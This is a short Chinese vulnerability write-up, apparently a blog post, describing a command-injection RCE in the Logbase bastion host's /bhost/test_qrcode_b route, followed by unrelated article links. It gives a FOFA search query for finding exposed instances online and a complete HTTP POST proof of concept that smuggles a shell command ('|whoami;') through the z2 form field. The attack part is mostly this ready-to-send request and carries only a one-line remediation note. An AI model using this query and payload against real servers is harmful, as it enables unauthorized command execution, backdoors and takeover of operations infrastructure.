思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

复制代码
((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

复制代码
POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: close

z1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

http://www.logbase.cn/

相关推荐
龙茶清欢13 分钟前
2、Nginx 与 Spring Cloud Gateway 详细对比:定位、场景与分工
java·运维·spring boot·nginx·spring cloud·gateway
云动雨颤15 分钟前
Linux运维必备:3个内存问题排查命令
linux·运维
失因19 分钟前
Nginx 特性、配置与实战部署
运维·数据库·nginx
云动雨颤19 分钟前
程序出错瞎找?教你写“会说话”的错误日志,秒定位原因
java·运维·php
程序员果子1 小时前
Kafka 深度剖析:架构演进、核心概念与设计精髓
大数据·运维·分布式·中间件·架构·kafka
粟悟饭&龟波功1 小时前
【网络安全】二、入门篇:HTTP 协议进阶 ——GET/POST 常用传参方法详解
安全·web安全·http
苹果醋31 小时前
SpringCloud高可用集群搭建及负载均衡配置实战
java·运维·spring boot·mysql·nginx
iconball1 小时前
个人用云计算学习笔记 --15. (Linux 系统启动原理、Linux 防火墙管理))
linux·运维·笔记·学习·云计算
dragoooon341 小时前
[Linux基础——Lesson2.Linux的基本指令使用]
linux·运维·服务器
半梦半醒*2 小时前
keepalived部署
运维·服务器·nginx·架构·centos·apache